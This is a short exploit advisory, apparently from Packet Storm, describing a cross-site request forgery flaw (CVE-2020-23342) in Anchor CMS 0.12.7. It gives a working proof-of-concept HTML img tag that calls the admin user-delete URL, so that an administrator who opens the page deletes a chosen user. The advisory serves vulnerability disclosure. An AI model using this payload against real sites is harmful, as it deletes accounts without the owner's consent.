Anchor CMS version 0.12.7 suffers from a cross site request forgery vulnerability.
2f75ad7082e071339ac57ce5a574de4d734e9ad408532c857a2f498ec69da3c0# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342
###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
================================
<img src="https://target/anchor/index.php/admin/users/delete/21">
================================
Where (21) is the user id .
When admin clicks on exploit.html link
User with id 21 will be deleted
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed